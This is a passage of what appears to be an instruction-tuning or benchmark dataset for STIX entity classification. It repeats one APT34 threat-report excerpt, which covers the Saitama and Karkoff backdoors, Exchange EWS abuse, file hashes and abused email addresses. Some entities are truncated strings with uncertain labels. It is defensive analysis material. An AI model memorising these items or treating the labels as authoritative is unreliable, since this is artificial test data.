MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nproton.me\n\n---\n\n### Text Passage:\nAttribution Analysis\nThere are several data points and indicators that suggest APT34 carried out this attack, and that this group is still active in targeting countries in the Middle East with a special focus on compromising government entities.\n**1\\. The first stage dropper**\nThe first stage dropper between the Saitama backdoor and this new operation\u2019s first stage .Net dropper have a few similarities. Despite the dated Saitama operation\u2019s first stage dropper, a VBA macro that drops the actual .Net backdoor Saitama malware, the new attack implemented in the group\u2019s latest deployment is a .Net dropper that drops the actual malware. Both deployments\u2019 final stages leverage EWS\u2019 Managed API (Microsoft.Exchange.WenServices.dll).\nFigure 17. Saitama backdoor\u2019s first stage dropper (left), and the dropped files for the new APT34 .Net backdoor in the first stage (right)\n**2\\. Leveraging exchange servers for communications (Uni- and bidirectional)**\nBoth this campaign and the Karkoff campaign made use of targeted exchange servers and relayed communications through it. In the previous campaign, this was reportedly done with the deployment of the Karkoff implant. The old Karkoff sample attributed to APT34 share a common functionality for abusing the EWS API.\nFigure 18. The Karkoff implant leveraging EWS (top), and the newer APT34 backdoor\u2019s use of EWS (bottom)\n**3\\. The victim targeted**\nAPT34 has been documented for targeting countries in the Middle East. In a previous campaign analyzed by Yoroi Labs, the Karkoff sample (SHA256: 1f47770cc42ac8805060004f203a5f537b7473a36ff41eabb746900b2fa24cc8) attributed to APT34 has the mail server domain hardcoded inside the sample. Alongside the target mail recipient the attackers receive information from is the same hardcoded mail server domain found in the latest backdoor, including the targeted Exchange Server for a government ministry. Both samples included some hardcoded credentials as well. However, the newer backdoor includes support for stealing the _new_ passwords of previously compromised users who changed their passwords, ensuring their legitimate accounts stay compromised.\nFigure 19. Karkoff implant targeting an army mail server in 2020 (top), and the newer APT backdoor targeting another mail server in 2023 (bottom)\nConclusions\nAt first glance, security teams can mistakenly tag the sample as safe or as a benign activity given the validity of the domains and mail credentials. It will take more experienced analysts to see that the domains abused is part of a bigger active directory domain \u201cforest\u201d, which share a trust relationship with each other to allow different government ministries or agencies to communicate. Considering we found a compromised account from one entity inside a sample sourced from a different agency indicates APT34 now has a deep foothold in the government domain forest.\nFollowing the stages executed, APT34\u2019s repeated use of the Saitama backdoor technique in the first stage indicates a confidence that even the dated malware\u2019s technique will continue to work and initiate compromise.\nThe next stages for exfiltrating data, however, are considerably new and are considered exploratory for the group. Despite the routine's simplicity, the novelty of the second and last stages also indicate that this entire routine can just be a small part of a bigger campaign targeting governments. We continue tracking and monitoring the abuse of this threat to determine the depth and breadth of this compromise.\nIndicators of Compromise (IOCs)\nSHA256 File name Detection\n---------\n5ed7ebc339af6ca6a5d1b9b45db6b3ae00232d9ccd80d5fcadf7680320bd4e6b DevicesSrv.exe Backdoor.MSIL.REDCAP.A\n827366355c6429a7fe12d111e240c5bcec3ed61e717fb84ea8b771672dd1f88e psgfilter.dll Trojan.Win64.REDCAP.AF\nEmails abused\n* Jaqueline.Herrera@proton.me\n* Ciara.Stoneburner@proton.me\n* marsha.fischer556@gmail.com\n* Kathryn.Firkins@proton.me\n* Susan.potts454@proton.me\n* Earl.butler945@gmail.com\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nMSIL.REDCAP.A\n\n---\n\n### Text Passage:\nAttribution Analysis\nThere are several data points and indicators that suggest APT34 carried out this attack, and that this group is still active in targeting countries in the Middle East with a special focus on compromising government entities.\n**1\\. The first stage dropper**\nThe first stage dropper between the Saitama backdoor and this new operation\u2019s first stage .Net dropper have a few similarities. Despite the dated Saitama operation\u2019s first stage dropper, a VBA macro that drops the actual .Net backdoor Saitama malware, the new attack implemented in the group\u2019s latest deployment is a .Net dropper that drops the actual malware. Both deployments\u2019 final stages leverage EWS\u2019 Managed API (Microsoft.Exchange.WenServices.dll).\nFigure 17. Saitama backdoor\u2019s first stage dropper (left), and the dropped files for the new APT34 .Net backdoor in the first stage (right)\n**2\\. Leveraging exchange servers for communications (Uni- and bidirectional)**\nBoth this campaign and the Karkoff campaign made use of targeted exchange servers and relayed communications through it. In the previous campaign, this was reportedly done with the deployment of the Karkoff implant. The old Karkoff sample attributed to APT34 share a common functionality for abusing the EWS API.\nFigure 18. The Karkoff implant leveraging EWS (top), and the newer APT34 backdoor\u2019s use of EWS (bottom)\n**3\\. The victim targeted**\nAPT34 has been documented for targeting countries in the Middle East. In a previous campaign analyzed by Yoroi Labs, the Karkoff sample (SHA256: 1f47770cc42ac8805060004f203a5f537b7473a36ff41eabb746900b2fa24cc8) attributed to APT34 has the mail server domain hardcoded inside the sample. Alongside the target mail recipient the attackers receive information from is the same hardcoded mail server domain found in the latest backdoor, including the targeted Exchange Server for a government ministry. Both samples included some hardcoded credentials as well. However, the newer backdoor includes support for stealing the _new_ passwords of previously compromised users who changed their passwords, ensuring their legitimate accounts stay compromised.\nFigure 19. Karkoff implant targeting an army mail server in 2020 (top), and the newer APT backdoor targeting another mail server in 2023 (bottom)\nConclusions\nAt first glance, security teams can mistakenly tag the sample as safe or as a benign activity given the validity of the domains and mail credentials. It will take more experienced analysts to see that the domains abused is part of a bigger active directory domain \u201cforest\u201d, which share a trust relationship with each other to allow different government ministries or agencies to communicate. Considering we found a compromised account from one entity inside a sample sourced from a different agency indicates APT34 now has a deep foothold in the government domain forest.\nFollowing the stages executed, APT34\u2019s repeated use of the Saitama backdoor technique in the first stage indicates a confidence that even the dated malware\u2019s technique will continue to work and initiate compromise.\nThe next stages for exfiltrating data, however, are considerably new and are considered exploratory for the group. Despite the routine's simplicity, the novelty of the second and last stages also indicate that this entire routine can just be a small part of a bigger campaign targeting governments. We continue tracking and monitoring the abuse of this threat to determine the depth and breadth of this compromise.\nIndicators of Compromise (IOCs)\nSHA256 File name Detection\n---------\n5ed7ebc339af6ca6a5d1b9b45db6b3ae00232d9ccd80d5fcadf7680320bd4e6b DevicesSrv.exe Backdoor.MSIL.REDCAP.A\n827366355c6429a7fe12d111e240c5bcec3ed61e717fb84ea8b771672dd1f88e psgfilter.dll Trojan.Win64.REDCAP.AF\nEmails abused\n* Jaqueline.Herrera@proton.me\n* Ciara.Stoneburner@proton.me\n* marsha.fischer556@gmail.com\n* Kathryn.Firkins@proton.me\n* Susan.potts454@proton.me\n* Earl.butler945@gmail.com\n",
"output": "MALWARE"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nMiddle East\n\n---\n\n### Text Passage:\nAttribution Analysis\nThere are several data points and indicators that suggest APT34 carried out this attack, and that this group is still active in targeting countries in the Middle East with a special focus on compromising government entities.\n**1\\. The first stage dropper**\nThe first stage dropper between the Saitama backdoor and this new operation\u2019s first stage .Net dropper have a few similarities. Despite the dated Saitama operation\u2019s first stage dropper, a VBA macro that drops the actual .Net backdoor Saitama malware, the new attack implemented in the group\u2019s latest deployment is a .Net dropper that drops the actual malware. Both deployments\u2019 final stages leverage EWS\u2019 Managed API (Microsoft.Exchange.WenServices.dll).\nFigure 17. Saitama backdoor\u2019s first stage dropper (left), and the dropped files for the new APT34 .Net backdoor in the first stage (right)\n**2\\. Leveraging exchange servers for communications (Uni- and bidirectional)**\nBoth this campaign and the Karkoff campaign made use of targeted exchange servers and relayed communications through it. In the previous campaign, this was reportedly done with the deployment of the Karkoff implant. The old Karkoff sample attributed to APT34 share a common functionality for abusing the EWS API.\nFigure 18. The Karkoff implant leveraging EWS (top), and the newer APT34 backdoor\u2019s use of EWS (bottom)\n**3\\. The victim targeted**\nAPT34 has been documented for targeting countries in the Middle East. In a previous campaign analyzed by Yoroi Labs, the Karkoff sample (SHA256: 1f47770cc42ac8805060004f203a5f537b7473a36ff41eabb746900b2fa24cc8) attributed to APT34 has the mail server domain hardcoded inside the sample. Alongside the target mail recipient the attackers receive information from is the same hardcoded mail server domain found in the latest backdoor, including the targeted Exchange Server for a government ministry. Both samples included some hardcoded credentials as well. However, the newer backdoor includes support for stealing the _new_ passwords of previously compromised users who changed their passwords, ensuring their legitimate accounts stay compromised.\nFigure 19. Karkoff implant targeting an army mail server in 2020 (top), and the newer APT backdoor targeting another mail server in 2023 (bottom)\nConclusions\nAt first glance, security teams can mistakenly tag the sample as safe or as a benign activity given the validity of the domains and mail credentials. It will take more experienced analysts to see that the domains abused is part of a bigger active directory domain \u201cforest\u201d, which share a trust relationship with each other to allow different government ministries or agencies to communicate. Considering we found a compromised account from one entity inside a sample sourced from a different agency indicates APT34 now has a deep foothold in the government domain forest.\nFollowing the stages executed, APT34\u2019s repeated use of the Saitama backdoor technique in the first stage indicates a confidence that even the dated malware\u2019s technique will continue to work and initiate compromise.\nThe next stages for exfiltrating data, however, are considerably new and are considered exploratory for the group. Despite the routine's simplicity, the novelty of the second and last stages also indicate that this entire routine can just be a small part of a bigger campaign targeting governments. We continue tracking and monitoring the abuse of this threat to determine the depth and breadth of this compromise.\nIndicators of Compromise (IOCs)\nSHA256 File name Detection\n---------\n5ed7ebc339af6ca6a5d1b9b45db6b3ae00232d9ccd80d5fcadf7680320bd4e6b DevicesSrv.exe Backdoor.MSIL.REDCAP.A\n827366355c6429a7fe12d111e240c5bcec3ed61e717fb84ea8b771672dd1f88e psgfilter.dll Trojan.Win64.REDCAP.AF\nEmails abused\n* Jaqueline.Herrera@proton.me\n* Ciara.Stoneburner@proton.me\n* marsha.fischer556@gmail.com\n* Kathryn.Firkins@proton.me\n* Susan.potts454@proton.me\n* Earl.butler945@gmail.com\n",
"output": "LOCATION"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\npotts454@proton.me\n\n---\n\n### Text Passage:\nAttribution Analysis\nThere are several data points and indicators that suggest APT34 carried out this attack, and that this group is still active in targeting countries in the Middle East with a special focus on compromising government entities.\n**1\\. The first stage dropper**\nThe first stage dropper between the Saitama backdoor and this new operation\u2019s first stage .Net dropper have a few similarities. Despite the dated Saitama operation\u2019s first stage dropper, a VBA macro that drops the actual .Net backdoor Saitama malware, the new attack implemented in the group\u2019s latest deployment is a .Net dropper that drops the actual malware. Both deployments\u2019 final stages leverage EWS\u2019 Managed API (Microsoft.Exchange.WenServices.dll).\nFigure 17. Saitama backdoor\u2019s first stage dropper (left), and the dropped files for the new APT34 .Net backdoor in the first stage (right)\n**2\\. Leveraging exchange servers for communications (Uni- and bidirectional)**\nBoth this campaign and the Karkoff campaign made use of targeted exchange servers and relayed communications through it. In the previous campaign, this was reportedly done with the deployment of the Karkoff implant. The old Karkoff sample attributed to APT34 share a common functionality for abusing the EWS API.\nFigure 18. The Karkoff implant leveraging EWS (top), and the newer APT34 backdoor\u2019s use of EWS (bottom)\n**3\\. The victim targeted**\nAPT34 has been documented for targeting countries in the Middle East. In a previous campaign analyzed by Yoroi Labs, the Karkoff sample (SHA256: 1f47770cc42ac8805060004f203a5f537b7473a36ff41eabb746900b2fa24cc8) attributed to APT34 has the mail server domain hardcoded inside the sample. Alongside the target mail recipient the attackers receive information from is the same hardcoded mail server domain found in the latest backdoor, including the targeted Exchange Server for a government ministry. Both samples included some hardcoded credentials as well. However, the newer backdoor includes support for stealing the _new_ passwords of previously compromised users who changed their passwords, ensuring their legitimate accounts stay compromised.\nFigure 19. Karkoff implant targeting an army mail server in 2020 (top), and the newer APT backdoor targeting another mail server in 2023 (bottom)\nConclusions\nAt first glance, security teams can mistakenly tag the sample as safe or as a benign activity given the validity of the domains and mail credentials. It will take more experienced analysts to see that the domains abused is part of a bigger active directory domain \u201cforest\u201d, which share a trust relationship with each other to allow different government ministries or agencies to communicate. Considering we found a compromised account from one entity inside a sample sourced from a different agency indicates APT34 now has a deep foothold in the government domain forest.\nFollowing the stages executed, APT34\u2019s repeated use of the Saitama backdoor technique in the first stage indicates a confidence that even the dated malware\u2019s technique will continue to work and initiate compromise.\nThe next stages for exfiltrating data, however, are considerably new and are considered exploratory for the group. Despite the routine's simplicity, the novelty of the second and last stages also indicate that this entire routine can just be a small part of a bigger campaign targeting governments. We continue tracking and monitoring the abuse of this threat to determine the depth and breadth of this compromise.\nIndicators of Compromise (IOCs)\nSHA256 File name Detection\n---------\n5ed7ebc339af6ca6a5d1b9b45db6b3ae00232d9ccd80d5fcadf7680320bd4e6b DevicesSrv.exe Backdoor.MSIL.REDCAP.A\n827366355c6429a7fe12d111e240c5bcec3ed61e717fb84ea8b771672dd1f88e psgfilter.dll Trojan.Win64.REDCAP.AF\nEmails abused\n* Jaqueline.Herrera@proton.me\n* Ciara.Stoneburner@proton.me\n* marsha.fischer556@gmail.com\n* Kathryn.Firkins@proton.me\n* Susan.potts454@proton.me\n* Earl.butler945@gmail.com\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nbutler945@gmail.com\n\n---\n\n### Text Passage:\nAttribution Analysis\nThere are several data points and indicators that suggest APT34 carried out this attack, and that this group is still active in targeting countries in the Middle East with a special focus on compromising government entities.\n**1\\. The first stage dropper**\nThe first stage dropper between the Saitama backdoor and this new operation\u2019s first stage .Net dropper have a few similarities. Despite the dated Saitama operation\u2019s first stage dropper, a VBA macro that drops the actual .Net backdoor Saitama malware, the new attack implemented in the group\u2019s latest deployment is a .Net dropper that drops the actual malware. Both deployments\u2019 final stages leverage EWS\u2019 Managed API (Microsoft.Exchange.WenServices.dll).\nFigure 17. Saitama backdoor\u2019s first stage dropper (left), and the dropped files for the new APT34 .Net backdoor in the first stage (right)\n**2\\. Leveraging exchange servers for communications (Uni- and bidirectional)**\nBoth this campaign and the Karkoff campaign made use of targeted exchange servers and relayed communications through it. In the previous campaign, this was reportedly done with the deployment of the Karkoff implant. The old Karkoff sample attributed to APT34 share a common functionality for abusing the EWS API.\nFigure 18. The Karkoff implant leveraging EWS (top), and the newer APT34 backdoor\u2019s use of EWS (bottom)\n**3\\. The victim targeted**\nAPT34 has been documented for targeting countries in the Middle East. In a previous campaign analyzed by Yoroi Labs, the Karkoff sample (SHA256: 1f47770cc42ac8805060004f203a5f537b7473a36ff41eabb746900b2fa24cc8) attributed to APT34 has the mail server domain hardcoded inside the sample. Alongside the target mail recipient the attackers receive information from is the same hardcoded mail server domain found in the latest backdoor, including the targeted Exchange Server for a government ministry. Both samples included some hardcoded credentials as well. However, the newer backdoor includes support for stealing the _new_ passwords of previously compromised users who changed their passwords, ensuring their legitimate accounts stay compromised.\nFigure 19. Karkoff implant targeting an army mail server in 2020 (top), and the newer APT backdoor targeting another mail server in 2023 (bottom)\nConclusions\nAt first glance, security teams can mistakenly tag the sample as safe or as a benign activity given the validity of the domains and mail credentials. It will take more experienced analysts to see that the domains abused is part of a bigger active directory domain \u201cforest\u201d, which share a trust relationship with each other to allow different government ministries or agencies to communicate. Considering we found a compromised account from one entity inside a sample sourced from a different agency indicates APT34 now has a deep foothold in the government domain forest.\nFollowing the stages executed, APT34\u2019s repeated use of the Saitama backdoor technique in the first stage indicates a confidence that even the dated malware\u2019s technique will continue to work and initiate compromise.\nThe next stages for exfiltrating data, however, are considerably new and are considered exploratory for the group. Despite the routine's simplicity, the novelty of the second and last stages also indicate that this entire routine can just be a small part of a bigger campaign targeting governments. We continue tracking and monitoring the abuse of this threat to determine the depth and breadth of this compromise.\nIndicators of Compromise (IOCs)\nSHA256 File name Detection\n---------\n5ed7ebc339af6ca6a5d1b9b45db6b3ae00232d9ccd80d5fcadf7680320bd4e6b DevicesSrv.exe Backdoor.MSIL.REDCAP.A\n827366355c6429a7fe12d111e240c5bcec3ed61e717fb84ea8b771672dd1f88e psgfilter.dll Trojan.Win64.REDCAP.AF\nEmails abused\n* Jaqueline.Herrera@proton.me\n* Ciara.Stoneburner@proton.me\n* marsha.fischer556@gmail.com\n* Kathryn.Firkins@proton.me\n* Susan.potts454@proton.me\n* Earl.butler945@gmail.com\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nWin64.REDCAP.AF\n\n---\n\n### Text Passage:\nAttribution Analysis\nThere are several data points and indicators that suggest APT34 carried out this attack, and that this group is still active in targeting countries in the Middle East with a special focus on compromising government entities.\n**1\\. The first stage dropper**\nThe first stage dropper between the Saitama backdoor and this new operation\u2019s first stage .Net dropper have a few similarities. Despite the dated Saitama operation\u2019s first stage dropper, a VBA macro that drops the actual .Net backdoor Saitama malware, the new attack implemented in the group\u2019s latest deployment is a .Net dropper that drops the actual malware. Both deployments\u2019 final stages leverage EWS\u2019 Managed API (Microsoft.Exchange.WenServices.dll).\nFigure 17. Saitama backdoor\u2019s first stage dropper (left), and the dropped files for the new APT34 .Net backdoor in the first stage (right)\n**2\\. Leveraging exchange servers for communications (Uni- and bidirectional)**\nBoth this campaign and the Karkoff campaign made use of targeted exchange servers and relayed communications through it. In the previous campaign, this was reportedly done with the deployment of the Karkoff implant. The old Karkoff sample attributed to APT34 share a common functionality for abusing the EWS API.\nFigure 18. The Karkoff implant leveraging EWS (top), and the newer APT34 backdoor\u2019s use of EWS (bottom)\n**3\\. The victim targeted**\nAPT34 has been documented for targeting countries in the Middle East. In a previous campaign analyzed by Yoroi Labs, the Karkoff sample (SHA256: 1f47770cc42ac8805060004f203a5f537b7473a36ff41eabb746900b2fa24cc8) attributed to APT34 has the mail server domain hardcoded inside the sample. Alongside the target mail recipient the attackers receive information from is the same hardcoded mail server domain found in the latest backdoor, including the targeted Exchange Server for a government ministry. Both samples included some hardcoded credentials as well. However, the newer backdoor includes support for stealing the _new_ passwords of previously compromised users who changed their passwords, ensuring their legitimate accounts stay compromised.\nFigure 19. Karkoff implant targeting an army mail server in 2020 (top), and the newer APT backdoor targeting another mail server in 2023 (bottom)\nConclusions\nAt first glance, security teams can mistakenly tag the sample as safe or as a benign activity given the validity of the domains and mail credentials. It will take more experienced analysts to see that the domains abused is part of a bigger active directory domain \u201cforest\u201d, which share a trust relationship with each other to allow different government ministries or agencies to communicate. Considering we found a compromised account from one entity inside a sample sourced from a different agency indicates APT34 now has a deep foothold in the government domain forest.\nFollowing the stages executed, APT34\u2019s repeated use of the Saitama backdoor technique in the first stage indicates a confidence that even the dated malware\u2019s technique will continue to work and initiate compromise.\nThe next stages for exfiltrating data, however, are considerably new and are considered exploratory for the group. Despite the routine's simplicity, the novelty of the second and last stages also indicate that this entire routine can just be a small part of a bigger campaign targeting governments. We continue tracking and monitoring the abuse of this threat to determine the depth and breadth of this compromise.\nIndicators of Compromise (IOCs)\nSHA256 File name Detection\n---------\n5ed7ebc339af6ca6a5d1b9b45db6b3ae00232d9ccd80d5fcadf7680320bd4e6b DevicesSrv.exe Backdoor.MSIL.REDCAP.A\n827366355c6429a7fe12d111e240c5bcec3ed61e717fb84ea8b771672dd1f88e psgfilter.dll Trojan.Win64.REDCAP.AF\nEmails abused\n* Jaqueline.Herrera@proton.me\n* Ciara.Stoneburner@proton.me\n* marsha.fischer556@gmail.com\n* Kathryn.Firkins@proton.me\n* Susan.potts454@proton.me\n* Earl.butler945@gmail.com\n",
"output": "MALWARE"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
